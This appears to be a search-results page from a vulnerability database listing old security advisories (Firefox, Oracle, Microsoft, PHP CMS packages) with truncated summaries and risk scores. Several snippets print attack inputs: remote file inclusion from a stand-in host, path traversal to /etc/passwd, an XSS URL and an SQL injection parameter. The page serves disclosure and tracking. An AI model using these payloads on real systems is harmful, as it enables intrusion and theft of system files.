Lucene search
K
SecurityvulnsMost viewed

47153 matches found

securityvulns
securityvulns
•added 2010/09/14 12:0 a.m.•91 views

ZDI-10-172: Mozilla Firefox tree Object Removal Remote Code Execution Vulnerability

ZDI-10-172: Mozilla Firefox tree Object Removal Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-172 September 13, 2010 -- CVE ID: CVE-2010-3168 -- CVSS: 9, AV:N/AC:L/Au:N/C:P/I:P/A:C -- Affected Vendors: Mozilla Firefox -- Affected Products: Mozilla Firefox...

9.3CVSS0.2AI score0.04812EPSS
Exploits0
securityvulns
securityvulns
•added 2010/08/30 12:0 a.m.•91 views

SQL injection vulnerability in TCMS

Vulnerability ID: HTB22576 Reference: http://www.htbridge.ch/advisory/sqlinjectionvulnerabilityintcms2.html Product: TCMS Vendor: Target CMS http://targetcms.com/ Vulnerable Version: 100728 and Probably Prior Versions Vendor Notification: 09 August 2010 Vulnerability Type: SQL Injection Status: N...

0.6AI score
Exploits0
securityvulns
securityvulns
•added 2010/08/30 12:0 a.m.•91 views

SQL injection vulnerability in TCMS

Vulnerability ID: HTB22578 Reference: http://www.htbridge.ch/advisory/sqlinjectionvulnerabilityintcms4.html Product: TCMS Vendor: Target CMS http://targetcms.com/ Vulnerable Version: 100728 and Probably Prior Versions Vendor Notification: 09 August 2010 Vulnerability Type: SQL Injection Status: N...

0.5AI score
Exploits0
securityvulns
securityvulns
•added 2010/07/24 12:0 a.m.•91 views

ZDI-10-134: Mozilla Firefox DOM Attribute Cloning Remote Code Execution Vulnerability

ZDI-10-134: Mozilla Firefox DOM Attribute Cloning Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-134 July 20, 2010 -- CVE ID: CVE-2010-1208 -- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C -- Affected Vendors: Mozilla Firefox -- Affected Products: Mozilla Firefox...

9.3CVSS0.7AI score0.05153EPSS
Exploits0
securityvulns
securityvulns
•added 2010/07/20 12:0 a.m.•91 views

Oracle / Sun applications multiple security vulneraebilities

Quarterly update fixed 59 different vulnerabilities...

10CVSS2.1AI score0.87264EPSS
Exploits43References14Affected Software13
securityvulns
securityvulns
•added 2010/06/09 12:0 a.m.•91 views

Microsoft IIS memory corruption

Memory corruption if Extended Protection for Authentication is enabled...

8.5CVSS2.8AI score0.28208EPSS
Exploits0References1Affected Software1
securityvulns
securityvulns
•added 2010/05/12 12:0 a.m.•91 views

Security update available for Shockwave Player

Security update available for Shockwave Player Release date: May 11, 2010 Vulnerability identifier: APSB10-12 CVE number: CVE-2010-0127, CVE-2010-0128, CVE-2010-0129, CVE-2010-0130, CVE-2010-0986, CVE-2010-0987, CVE-2010-1280, CVE-2010-1281, CVE-2010-1282, CVE-2010-1283, CVE-2010-1284,...

9.3CVSS2.1AI score0.16637EPSS
Exploits10
securityvulns
securityvulns
•added 2010/03/17 12:0 a.m.•91 views

rPSA-2010-0018-1 bind bind-utils caching-nameserver

rPath Security Advisory: 2010-0018-1 Published: 2010-03-15 Products: rPath Appliance Platform Linux Service 1 rPath Appliance Platform Linux Service 2 rPath Linux 1 rPath Linux 2 Rating: Severe Exposure Level Classification: Remote User Deterministic Vulnerability Updated Versions:...

7.6CVSS7AI score0.95182EPSS
Exploits21
securityvulns
securityvulns
•added 2010/01/26 12:0 a.m.•91 views

FWD: LedgerSMB Security Advisory: Multiple Vulnerabilities

Hi all; It has been brought to our attention that a number of security vulnerabilities have been noted in SQL-Ledger. Several of these affect earlier versions of LedgerSMB, and three hotfixes have been released for problems that continue to affect the LedgerSMB codebase. As always, we highly...

7.5CVSS0.2AI score0.01391EPSS
Exploits2
securityvulns
securityvulns
•added 2009/08/25 12:0 a.m.•91 views

Linux kernel multiple security vulnerabilities

Multiple DoS conditions, information leaks...

7.8CVSS1.6AI score0.08156EPSS
Exploits22References1
securityvulns
securityvulns
•added 2009/07/14 12:0 a.m.•91 views

Microsoft Security Bulletin MS09-031 - Important Vulnerability in Microsoft ISA Server 2006 Could Cause Elevation of Privilege (970953)

Microsoft Security Bulletin MS09-031 - Important Vulnerability in Microsoft ISA Server 2006 Could Cause Elevation of Privilege 970953 Published: July 14, 2009 Version: 1.0 General Information Executive Summary This security update resolves a privately reported vulnerability in Microsoft Internet...

9CVSS0.1AI score0.26454EPSS
Exploits1
securityvulns
securityvulns
•added 2009/06/26 12:0 a.m.•91 views

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

10CVSS1.5AI score0.95438EPSS
Exploits17References4Affected Software3
securityvulns
securityvulns
•added 2009/04/23 12:0 a.m.•91 views

Mozilla Foundation Security Advisory 2009-14

Mozilla Foundation Security Advisory 2009-14 Title: Crashes with evidence of memory corruption rv:1.9.0.9 Impact: Critical Announced: April 21, 2009 Reporter: Mozilla developers Products: Firefox, Thunderbird, SeaMonkey Fixed in: Firefox 3.0.9 Thunderbird 2.0.0.22 SeaMonkey 1.1.16 Description...

5CVSS1.1AI score0.029EPSS
Exploits3
securityvulns
securityvulns
•added 2009/04/03 12:0 a.m.•91 views

Q2 Solutions ConnX - SQL Injection Vulnerability

aushack.com - Vulnerability Advisory ----------------------------------------------- Release Date: 03-Apr-2009 Software: Q2 Solutions - ConnX http://www.q2solutions.com.au/ "ConnX is a ready built internet/intranet solution that empowers employees and management to view and update HR and Payroll...

0.7AI score
Exploits0
securityvulns
securityvulns
•added 2009/03/15 12:0 a.m.•91 views

[SECURITY] [DSA 1739-1] New mldonkey packages fix information disclosure

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1739-1 [email protected] http://www.debian.org/security/ Florian Weimer March 13, 2009 http://www.debian.org/security/faq -...

5CVSS0.3AI score0.05803EPSS
Exploits0
securityvulns
securityvulns
•added 2009/01/14 12:0 a.m.•91 views

PHP Buffer Overflow(popen)

Apache 2.2.11/PHP 5.2.8 Buffer Overflow Exploit popen func Type: Remote and Local Requirements for exploit: popen enabled. By: e.wiZz! Enes MuÑ™i [email protected] PHP Popen function overview: Popen function in php opens a pipe to a process executed by forking the command given by command. It was...

0.6AI score
Exploits0
securityvulns
securityvulns
•added 2008/12/10 12:0 a.m.•91 views

Microsoft Security Bulletin MS08-072 - Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution (957173)

Microsoft Security Bulletin MS08-072 - Critical Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution 957173 Published: December 9, 2008 Version: 1.0 General Information Executive Summary This security update resolves eight privately reported vulnerabilities in Microsoft Offi...

9.3CVSS0.2AI score0.38057EPSS
Exploits0
securityvulns
securityvulns
•added 2008/12/10 12:0 a.m.•91 views

Two XSS Flaws in PrestaShop 1.1.0.3

Affects PrestaShop 1.1.0.3 product: homepage: http://prestashop.com This is XSS in the URI of PrestaShop. Trust no one, not even your $SERVERPHPSELF . http://10.1.1.155/prestashop1.1.0.3/admin/login.php/223Cscript3Ealert13C/script3E Add an item to the shoping cart and then vist this url:...

0.4AI score
Exploits0
securityvulns
securityvulns
•added 2008/09/14 12:0 a.m.•91 views

Linux kernel multiple security vulnerabilities

Multiple local DoS conditions, sndseqosssynthmakeinfo information leaks, integer overflows in DCCP and SCTPAUTHKEY...

9.3CVSS2.2AI score0.04353EPSS
Exploits12References2Affected Software1
securityvulns
securityvulns
•added 2008/09/07 12:0 a.m.•91 views

Atheros Vendor Specific Information Element Overflow

Title: ------ Atheros Vendor Specific Information Element Overflow Summary: -------- The wireless drivers in some Wi-Fi access points such as the ATHEROS-based Linksys WRT350N do not correctly parse the Atheros vendor specific information element included in association requests. This information...

6.3CVSS1.5AI score0.01799EPSS
Exploits1
securityvulns
securityvulns
•added 2008/08/26 12:0 a.m.•91 views

Multiple Vulnerabilities in AWStats Totals

Emory University UTS Security Advisory EMORY-2008-01 Topic: Multiple Vulnerabilities in AWStats Totals Original release date: August 26, 2008 SUMMARY ======= Telartis's AWStats Totals program is vulnerable to command execution and cross site scripting attacks. A remote attacker could exploit thes...

1.2AI score
Exploits0
securityvulns
securityvulns
•added 2008/06/14 12:0 a.m.•91 views

Exploit for vBulletin "obscure" XSS (3.7.1 & 3.6.10)

====================================================================== Advisory : Exploit for vBulletin "obscure" XSS Release Date : June 13th 2008 Application : vBulletin Version : vBulletin 3.7.1 and lower, vBulletin 3.6.10 and lower Platform : PHP Vendor URL : http://www.vbulletin.com/ Authors...

6.1AI score
Exploits0
securityvulns
securityvulns
•added 2008/05/08 12:0 a.m.•91 views

VBZooM <=V1.11 "reply.php" SQL Injection Vulnerability

================================================= Discovered By: CrAzY CrAcKeR Email: Cr4zY.CrAcKeRathotmaildotcom Script : VBZooM V1.11 ================================================ Search: POWERED BY: VBZooM V1.11 http://www.example.com/vb1/reply.php?UserID=SQL...

0.2AI score
Exploits0
securityvulns
securityvulns
•added 2008/03/20 12:0 a.m.•91 views

IBM Rational ClearQuest Web Multiple XSS Vulnerabilities

IBM Rational ClearQuest Web Multiple XSS CVE-2007-4592 Discovered on 07-24-07 by sasquatch of SecureState - www.securestate.com Multiple cross site scripting vulnerabilities exist within IBM's Rational ClearQuest Web interface. VULNERABLE VARIABLES: ===================== contextid query string...

4.3CVSS0.3AI score0.04495EPSS
Exploits2
securityvulns
securityvulns
•added 2008/02/07 12:0 a.m.•91 views

[Full-disclosure] iDefense Security Advisory 02.04.08: Hewlett-Packard Network Node Manager Topology Manager Service DoS Vulnerability

iDefense Security Advisory 02.04.08 http://labs.idefense.com/intelligence/vulnerabilities/ Feb 04, 2008 I. BACKGROUND HP Network Node Manager is a network mapping and management application that allows administrators to monitor and control their networks. The ovtopmd process listens, in a default...

7.8CVSS0.1AI score0.04443EPSS
Exploits1
securityvulns
securityvulns
•added 2008/01/02 12:0 a.m.•91 views

LiveCart Multiple Cross-Site Scripting Vulnerabilities

HSC LiveCart Multiple Cross-Site Scripting Vulnerabilities LiveCart is a new PHP/MySQL powered shopping cart software developed by Integry Systems. An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site...

1.6AI score
Exploits0
securityvulns
securityvulns
•added 2007/10/29 12:0 a.m.•91 views

[Full-disclosure] Team SHATTER Alert: Oracle Database Buffer overflow vulnerability in procedure DBMS_AQADM_SYS.DBLINK_INFO

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Team SHATTER Security Alert Oracle Database Buffer overflow vulnerability in procedure DBMSAQADMSYS.DBLINKINFO October 29, 2007 Risk Level: Medium Affected versions: Oracle Database Server versions 9iR1, 9iR2 9.2.0.7 and previous patchsets and 10gR1...

0.4AI score
Exploits0
securityvulns
securityvulns
•added 2007/10/29 12:0 a.m.•91 views

[Full-disclosure] Team SHATTER Alert: Oracle Database Buffer overflow vulnerability in function MDSYS.SDO_CS.TRANSFORM

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Team SHATTER Security Alert Oracle Database Buffer overflow vulnerability in function MDSYS.SDOCS.TRANSFORM October 29, 2007 Risk Level: High Affected versions: Oracle Database Server versions 8iR3, 9iR1, 9iR2 9.2.0.6 and previous patchsets and 10gR1...

0.2AI score
Exploits0
securityvulns
securityvulns
•added 2007/10/04 12:0 a.m.•91 views

Cart32 Arbitrary File Download Vulnerability

======================================================================== = Cart32 Arbitrary File Download Vulnerability = = Vendor Website: = http://www.cart32.com = = Affected Version: = -- All releases prior to and including v6.3 = = Public disclosure on Thursday 4th October 2007 =...

0.4AI score
Exploits0
securityvulns
securityvulns
•added 2007/07/13 12:0 a.m.•91 views

[Full-disclosure] ActiveWeb Contentserver CMS Clientside Filtering of Page Editor Content

Advisory: ActiveWeb Contentserver CMS Clientside Filtering of Page Editor Content RedTeam Pentesting discovered a design vulnerability in the page editor of the activeWeb contentserver CMS during a penetration test. Filtering of user content, e.g. to prevent the usage of Javascript code, is done ...

4CVSS6.5AI score0.05142EPSS
Exploits1
securityvulns
securityvulns
•added 2007/07/05 12:0 a.m.•91 views

SAP DB Web Server Stack Overflow

======= Summary ======= Name: SAP DB Web Server Stack Overflow Release Date: 5 July 2007 Reference: NGS00486 Discover: Mark Litchfield [email protected] Vendor: SAP Vendor Reference: SECRES-291 Systems Affected: All Versions Risk: Critical Status: Fixed ======== TimeLine ======== Discovered: 3...

7.3AI score
Exploits0
securityvulns
securityvulns
•added 2007/04/11 12:0 a.m.•91 views

Sisplet CMS <= 05.10 (site_path) Remote File Inclusion Vulnerability

Sisplet CMS Found by kezzap66345 Script Download:http://www.sisplet.org/uploadi/editor/Sisplet0504.tar.bz2 https://sourceforge.net/project/showfiles.php?groupid=111881 ERROR1: File:main/forum/komentar.php require$sitepath.'main/forum/class.php'; rfi coded RFI1:...

7.2AI score
Exploits0
securityvulns
securityvulns
•added 2007/02/22 12:0 a.m.•91 views

LoveCMS 1.4 multiple vulnerabilities

rfi: /lovecms/install/index.php?step=http://site.com/boum.txt? lfi: /lovecms/install/index.php?step=/etc/passwd00 /lovecms/?load=../../../../../../../../../../etc/passwd00 admin upload vuln : upload any kind of file even if it's not accepted it will be stored here : /modules/content/pictures/tmp/...

2.2AI score
Exploits0
securityvulns
securityvulns
•added 2007/02/07 12:0 a.m.•91 views

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

10CVSS1.5AI score0.68305EPSS
Exploits3References9Affected Software13
securityvulns
securityvulns
•added 2007/01/18 12:0 a.m.•91 views

SYMSA-2007-001: Oracle Application Server 10g - Directory Traversal

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Symantec Vulnerability Research http://www.symantec.com/research Security Advisory Advisory ID: SYMSA-2007-001 Advisory Title: Oracle Application Server 10g - Directory Traversal Release Date: 16-01-2007 Application: Oracle Application Server 10g...

5CVSS0.1AI score0.10609EPSS
Exploits0
securityvulns
securityvulns
•added 2006/12/20 12:0 a.m.•91 views

cwmVote 1.0 File Include Vulnerability

cwmVote 1.0 File Include Vulnerability F0und3R: bd0rk || SOH-Crew Website: www.soh-crew.it.tt Download: http://explorer.cwm-design.de/dirs/41/cwmVote.rar Vulnerable Code in archive.php Code: include$abs."inc/functions.inc.php"; include$abs."inc/conf.mysql.inc.php";...

0.2AI score
Exploits0
securityvulns
securityvulns
•added 2006/11/22 12:0 a.m.•91 views

enomphp => 4.0 Remote Traversal Directory

""""""""""""""""""""""""""""""""""""""""""""""" """ :: :: ::::: :::: """ """ :: :: :: : :: """ """ :::: :: :: ::::: ::::: :::: """ """ :: :: ::: ::: :: :: :: :: :: """ """ :: :: :: : : ::::: :: :: :::: """ """ """ """"""""""""""""""""""""""""""""""""""""""""""" Xmor$ DigitaL Hacking TeaM enomphp ...

1.7AI score
Exploits0
securityvulns
securityvulns
•added 2006/11/10 12:0 a.m.•91 views

[SA22803] ProFTPD Unspecified Vulnerability

TITLE: ProFTPD Unspecified Vulnerability SECUNIA ADVISORY ID: SA22803 VERIFY ADVISORY: http://secunia.com/advisories/22803/ CRITICAL: Moderately critical IMPACT: System access WHERE: From remote SOFTWARE: ProFTPD 1.3.x http://secunia.com/product/5430/ DESCRIPTION: Evgeny Legerov has reported a...

0.9AI score
Exploits0
securityvulns
securityvulns
•added 2006/11/05 12:0 a.m.•91 views

Ariadne v2.4 (store_config[code]) Remote File Include Vuln

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Ariadne v2.4 storeconfigcode Remote File Include Vuln =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Found: Cyber-Security.Org...

0.4AI score
Exploits0
securityvulns
securityvulns
•added 2006/10/05 12:0 a.m.•91 views

phpBB Static Topics <= 1.0 [phpbb_root_path] Remote File Include Vulnerability

--------------------------------------------------------------------------- phpBB Static Topics = 1.0 phpbbrootpath Remote File Include Vulnerability --------------------------------------------------------------------------- Discovered By Kw3RLn Romanian Security Team : hTTp://RST-CREW.net :...

1.2AI score
Exploits0
securityvulns
securityvulns
•added 2006/10/02 12:0 a.m.•91 views

[Full-disclosure] Microsoft Internet Information Services UTF-7 XSS Vulnerability [MS06-053]

Title: Microsoft Internet Information Services UTF-7 XSS Vulnerability http://www.geocities.jp/ptrssec/advisory09e.html + Date: 1 October 2006 + Author: Eiji James Yoshida [email protected] + Risk: Medium + Vulnerable: Internet Information Services + Overview: Using UTF-7 encoded URLs, IIS...

0.1AI score
Exploits0
securityvulns
securityvulns
•added 2006/09/06 12:0 a.m.•91 views

ACGV News <= v0.9.1 (PathNews) Remote File Inclusion Exploit

============================================================================================== ACGV News = v0.9.1 PathNews Remote File Inclusion Exploit =============================================================================================== Critical Level : Dangerous Venedor site :...

1.3AI score
Exploits0
securityvulns
securityvulns
•added 2006/08/21 12:0 a.m.•91 views

Mambo mambelfish Component <= 1.1 Remote File Include Vulnerability

C Y BE R - W A R R i O R T I M mambo commambelfish Component mosConfigabsolutepath Remote File Inclusion Vulnerabilities Author: mdx Class : Remote cont@ct: bilkopatathotmaildotcom Code: mambelfish.class.php?, line 28 requireonce...

1.1AI score
Exploits0
securityvulns
securityvulns
•added 2006/05/05 12:0 a.m.•91 views

[Full-disclosure] CAID 34013 - CA Common Services CAIRIM on z/OS LMP SVC vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Title: CAID 34013 - CA Common Services CAIRIM on z/OS LMP SVC vulnerability CA Vulnerability ID: 34013 CA Advisory Date: 2006-05-02 Discovered By: IBM Global Services Impact: Local attacker can gain escalated privileges. Summary: A potential...

0.2AI score
Exploits0
securityvulns
securityvulns
•added 2006/02/06 12:0 a.m.•91 views

SECURITY.NNOV: The Bat! 2.x message headers spoofing

Title: The Bat! 2.x message headers spoofing Author: 3APA3A [email protected] Homepage: http://www.security.nnov.ru/ Advisory URL: http://www.security.nnov.ru/advisories/thebatspoof.asp Vendor: RitLabs Vendor's page http://thebat.net/ Application: The Bat 2.x 2.12.04 tested Not vulnerable:...

0.6AI score
Exploits0
securityvulns
securityvulns
•added 2006/01/30 12:0 a.m.•91 views

Pioneers game server DoS

Oversized chat message causes game server to crash...

2.5AI score
Exploits0References1Affected Software1
securityvulns
securityvulns
•added 2006/01/24 12:0 a.m.•91 views

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

1.5AI score
Exploits0References2Affected Software2
securityvulns
securityvulns
•added 2005/12/04 12:0 a.m.•91 views

eXtreme Styles mod <= 2.2.1 Multiple Vulnerabilities

Site: http://www.phpbbstyles.com/ 1. Remote File Content Disclosure http://forum/admin/xsedit.php?edit=../../../../etc/passwd 2. Full Path Disclosure http://forum/admin/xsedit.php?edit=&viewbackup=1 http://wtf.bz/...

0.3AI score
Exploits0
securityvulns
securityvulns
•added 2005/11/07 12:0 a.m.•91 views

Macromedia Flash Player array index overflow

User controlled value is used as function pointers array index without boundary control...

5AI score
Exploits0References5Affected Software4
securityvulns
securityvulns
•added 2005/03/20 12:0 a.m.•91 views

[NT] Magic Winmail Server's Multiple Vulnerabilities

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source...

Exploits0
Total number of security vulnerabilities5000